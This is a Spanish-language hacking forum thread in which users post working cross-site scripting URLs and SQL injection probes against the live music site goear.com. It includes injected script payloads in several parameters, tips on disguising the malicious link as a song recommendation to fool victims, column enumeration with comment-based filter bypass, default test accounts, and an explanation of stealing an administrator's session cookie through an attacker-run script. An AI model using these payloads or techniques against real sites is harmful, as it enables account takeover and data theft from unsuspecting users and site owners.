Test Foro de elhacker.net SMF 2.1

Por lo general no posteo xss pero este en particular me parece que es especialmente grave por la ingenieria social que se le puede aplicar, ya que es en un sitio de musica online y es facil decir "Oh mira que cancion tan buena" :¬¬

Esta reportado 11/08/2009

El xss esta en la pagina donde se abre el reproductor portable...

Yo lo llamaria inyeccion html :¬¬ pero para que WHK no reclame lo llamaremos xss xD

por ejemplo tenemos una cancion cualquiera:

http://www.goear.com/listenwin.php?v=78707c5

le agregamos nuestro codigo malo xD

http://www.goear.com/listenwin.php?v=78707c5'><script>alert('te robamos tus cookies... gracias ;)')</script>

Que en el navegador se vera:

http://www.goear.com/listenwin.php?v=78707c5'%3E%3Cscript%3Ealert('te%20robamos%20tus%20cookies...%20gracias%20;)')%3C/script%3E

y que podemos disfrazar en foros asi

http://www.goear.com/listenwin.php?v=78707c5 (http://www.goear.com/listenwin.php?v=78707c5'%3E%3Cscript%3Ealert('te%20robamos%20tus%20cookies...%20gracias%20;)')%3C/script%3E) y decir "esta cancion es genial"

No se cargara la cancion pero la gente no dudara a menos que vea la direccion xD en fin

Saludos.

PD: Solo se le agrego un alert pero la gente puede ser un poco mas ingeniosa, si no quieren que la direccion aparezca como http://www.goear.com/listenwin.php?v=78707c5'> solo quitenlo, se ejecuta igual nuestra inyec... XSS ¬¬

estaba buscando vulenrabilidad a goear cuando me vengoa l foro y ya postearon! xd!

genial!, lo agregaré al recopilarorio de advisories:
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_301009-t244090.0.html

Ok gracias :) complemente la informacion en el post de SDC que no recordaba xD

http://foro.elhacker.net/nivel_web/recopilatorio_de_vulnerabilidades_de_xsssqlinjection-t220843.0.html;msg1343265#msg1343265

Ahi aclare que la vulnerabilidad no ha sido reparada y puse los datos que se piden

**********
EDITO:
**********

El buscador de goear tambien tiene xss, solo hay que escapar con "> por ejemplo si buscas

green day"><script>alert('janito24')</script>

Lo que te llevaria a:

http://www.goear.com/search.php?q=green+day%22%3E%3Cscript%3Ealert%28%27janito24%27%29%3C%2Fscript%3E

Agregale un SQLI  :P


http://www.goear.com/listenwin.php?v=78707c5'+and+1=1+--+
http://www.goear.com/listenwin.php?v=78707c5'+and+1=2+--+


a ver si podemos sacar algo de aca, nose si servira de algo:

http://www.goear.com/listenwin.php?v=%22%3E1+/**/ordEr+/**/++By+10--


adios

No se para que tanto  desordern en el order tan solo con el /**/ te saltas el filtro :xD Lo malo es que el Select te lo jode :xD

YST sería bueno que reportaras la sqli :)

Saludos y felicidades ;)

Cita de: janito24 en  9 Noviembre 2009, 06:46 AM
YST sería bueno que reportaras la sqli :)

Yo no reporto nada :xD Si alguien quiere reportarlo es libre :P

en goear hay un bug, realemente importante, si quieren le publico y si no se puede por mp se los dire


saludos

Cual es? Yo quiero saber :p

No creo que haya problemas, pero primero avísale a ellos ;) yo el xss lo encontré hace un par de meses, incluso se lo mostré a Carloswaldo, pero como los tipos tienen botada la página ayer lo publique xD

bueno, el bug si lo leen los del staff, es un bug que afecta a los archivos que son subidos a goear, y por ende, es posible descargar el archivo .mp3.

ese es el bug, ahora si me dejan digo como  :P, enicma es muy bobo


saludos!

Medio mundo se descarga musica de goear, ¿nos vas a contar algo nuevo? :xD

Seee el archivo mp3 queda en los temporales... Pero no le cuentes a nadie xD youtube también tiene ese bug :xD

ok sabelotodo
porai alguien no lo sabia
adio

Disculpa sólo bromeaba ;)

lo que fede dice es entrar directamente a la base de datos y descargar el archivo original *.mp3, no descomponer el flash genio.

Cita de: castg en 10 Noviembre 2009, 02:31 AM
lo que fede dice es entrar directamente a la base de datos y descargar el archivo original *.mp3, no descomponer el flash genio.

Lo se "genio" y tambien lo entiendo, ademas se puede usar como hosting de mp3 para poner en reproductores propios ;)

Por ejemplo:

http://www.goear.com/files/sst/mp3files/18072006/fd33fba0e00448176ef025f7b52c4be5.mp3

Saludos... "GENIO"

:xD Tambien tiene la vulnerabilidad SDC xDDDDDDDDD user: test pass: test jajajajaja no es bug pero es simpatico... muchas webs tienen a ese usuario registrado ¬¬ demasiadas

user:12345
pass: 12345

////////////

user: prueba
pass: prueba

//////////////

¬¬

jeje aca estoy, no se peleen hey!


no importa janito, es que nose, porai alguien no lo sabia.

es facil: ya fue ahora lo explico

vas a goear desde el IE, esperas a que llege al 100%,despues vas a C:\Documents and Settings\usuario\Configuración local\Archivos temporales de Internet

y ahi estara el archivo.


si alguien quiere encontra alguna sqlI, en goear, mandenme el msnm que lo agrego y hablamos y nos fijamos.

saludos!

agrego un xss, más.lo obutbe a partir del titulo  :xD:

http://www.goear.com/searchbycat.php?c=%3C/title%3E%3Cscript%3Ealert%28%22Otro%20xss%20mas%22%29%3C/script%3E

esta minado de xss!


saludos!

Cita de: fede_cp en 10 Noviembre 2009, 04:16 AM
agrego un xss, más.lo obutbe a partir del titulo  :xD:

http://www.goear.com/searchbycat.php?c=%3C/title%3E%3Cscript%3Ealert%28%22Otro%20xss%20mas%22%29%3C/script%3E

esta minado de xss!


saludos!

No te metas al login  :silbar: ajajajajajaja

Saludos ;)

Cita de: janito24 en 10 Noviembre 2009, 04:25 AM

Cita de: fede_cp en 10 Noviembre 2009, 04:16 AM
agrego un xss, más.lo obutbe a partir del titulo  :xD:

http://www.goear.com/searchbycat.php?c=%3C/title%3E%3Cscript%3Ealert%28%22Otro%20xss%20mas%22%29%3C/script%3E

esta minado de xss!


saludos!

No te metas al login  :silbar: ajajajajajaja

Saludos ;)

no entendi jajaj
saludos

Pero lo de descargar el .mp3 no es un bug :xD

ESTA bbien!!. me equiboque! jajaj


saludos

Cita de: fede_cp en 10 Noviembre 2009, 04:39 AM
ESTA bbien!!. me equiboque! jajaj


saludos

Pero no me grites :¬¬

jajaja

si quieren un bug:

http://www.goear.com/listenwin.php?v=78707c5%27-1+Order/**/+By+33--++

http://www.goear.com/listenwin.php?v=78707c5%27-1+Order/**/+By+34--++

ahi si hay una sqlI

lo que no pude hacer fue hacer el SELECT, tiene buenos filtros, no lo pude sacar ni poniendo maysuculas ni /**/, asique si alguien me ayuda

mandenme el mail por mp asi lo hablamos


saludos!

otro mas: http://www.goear.com/search.php?q=leonchalon&p=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28%22Holamundo%22%29%3C/script%3E (http://www.goear.com/search.php?q=leonchalon&p=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28%22Holamundo%22%29%3C/script%3E)

pobre goear ya le dieron vuelta la web completa.. falta un lfi y estamos jajaja..

Tiene todos los bugs conocidos xD me arrepiento de haber posteado esa web xD por lo menos ningún lammer le ha hecho un pwned xD

igualemente, nose si estaran de acuerdo, pero me parece una verguenza en una pagina tal como goear, tener todavía vulnerabilidades xss.

saludos, alguien se ocmunico con goear?

Cita de: fede_cp en 10 Noviembre 2009, 23:12 PM
igualemente, nose si estaran de acuerdo, pero me parece una verguenza en una pagina tal como goear, tener todavía vulnerabilidades xss.

saludos, alguien se ocmunico con goear?

El 98% de las paginas que usan algun lenguaje dinamico tienen algún XSS de hecho hasta esta web tiene XSS tambien la cia la nasa etc..:xD A si que no es para sorprenderse

mi ingles es pesimo :¬¬

CitarVulnerbility. hello, my name is tomás from argentina, my english is very bad. please sorry. we found much bugs in your web. you can see any bugs here: http://foro.elhacker.net/nivel_web/xss_en_goearcom-t273533.30.html. we think a web like a goear have much bugs. bye bye.

Cita de: YST en 10 Noviembre 2009, 23:36 PM

Cita de: fede_cp en 10 Noviembre 2009, 23:12 PM
igualemente, nose si estaran de acuerdo, pero me parece una verguenza en una pagina tal como goear, tener todavía vulnerabilidades xss.

saludos, alguien se ocmunico con goear?

El 98% de las paginas que usan algun lenguaje dinamico tienen algún XSS de hecho hasta esta web tiene XSS tambien la cia la nasa etc..:xD A si que no es para sorprenderse

claro, son las mas comunes, pero tambien encontre una sqlI  :o

saludos

Cita de: fede_cp en 11 Noviembre 2009, 00:49 AM

Cita de: YST en 10 Noviembre 2009, 23:36 PM

Cita de: fede_cp en 10 Noviembre 2009, 23:12 PM
igualemente, nose si estaran de acuerdo, pero me parece una verguenza en una pagina tal como goear, tener todavía vulnerabilidades xss.

saludos, alguien se ocmunico con goear?

El 98% de las paginas que usan algun lenguaje dinamico tienen algún XSS de hecho hasta esta web tiene XSS tambien la cia la nasa etc..:xD A si que no es para sorprenderse

claro, son las mas comunes, pero tambien encontre una sqlI  :o

saludos

¿Cual encontraste tu ? :P

Cita de: YST en 11 Noviembre 2009, 02:35 AM

Cita de: fede_cp en 11 Noviembre 2009, 00:49 AM

Cita de: YST en 10 Noviembre 2009, 23:36 PM

Cita de: fede_cp en 10 Noviembre 2009, 23:12 PM
igualemente, nose si estaran de acuerdo, pero me parece una verguenza en una pagina tal como goear, tener todavía vulnerabilidades xss.

saludos, alguien se ocmunico con goear?

El 98% de las paginas que usan algun lenguaje dinamico tienen algún XSS de hecho hasta esta web tiene XSS tambien la cia la nasa etc..:xD A si que no es para sorprenderse

claro, son las mas comunes, pero tambien encontre una sqlI  :o

saludos

¿Cual encontraste tu ? :P

osea yo hablaba de unos posts mas atras que presente, cuando saque las columnas, eso no lo habia puesto nadie. el tema ahroa igual no es peliar es descubrir mas fallas


saludos

intentaron colar shell  ?
no creo que se pueda , pero el no ya lo tenemos jajajja xD

Pobre webmaster... xD sí se le ocurre arreglar les aseguro que encontrará más cosas y bien feas.

PD: A modo de petición sí alguien tiene la oportunidad de defacear la página porfavor no lo haga. Al fin y al cabo es música gratis para todos :)

la cancion subida por el user test xD: (yo no fui) fue alguno de ustedes?: http://www.goear.com/listen/63f1eca/test-test (http://www.goear.com/listen/63f1eca/test-test)

Cita de: castg en 11 Noviembre 2009, 21:36 PM
la cancion subida por el user test xD: (yo no fui) fue alguno de ustedes?: http://www.goear.com/listen/63f1eca/test-test (http://www.goear.com/listen/63f1eca/test-test)

Pense que seria un rickrolleo xDDDDDD

No sean malos con esa web.

CitarUpload result

File sent succesfully ;-).
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '">
test2','test2\'"><h1>test2</textarea></div>fuck&' at line 1

Cita de: WHK en 11 Noviembre 2009, 21:52 PM
No sean malos con esa web.

+ 1 ¬¬

En el hipotetico caso que la otra persona abra el link de goear modificado que yo le paso desde su pc, que es lo que pasa o cual es el siguiente paso que debo hacer

Cita de: Joaquín^^ en 13 Diciembre 2009, 19:17 PM
En el hipotetico caso que la otra persona abra el link de goear modificado que yo le paso desde su pc, que es lo que pasa o cual es el siguiente paso que debo hacer

Hipoteticamente nada a menos que sea un administrador y en el eventualmente tenga algun sistema eventual de administracion que en alguna ocacion maneje cookies para el ingreso a esta.

En ese caso hipotetico tendrias que enviarle tu nick y lograr robar su cookie a travez de alguna paginita pequeña escrita en php por ti :D

Siento que hay algo en estas cosas que no me cierra
no entiendo nada..
Como llega la cookie hasta mi?

Cita de: Joaquín^^ en 14 Diciembre 2009, 02:33 AM
Siento que hay algo en estas cosas que no me cierra
no entiendo nada..
Como llega la cookie hasta mi?

Te llega una carta a la casa con la cookie :¬¬

Tienes que hacer que se haga una peticion a un script tuyo pasandole la cookie que obtenga la coockie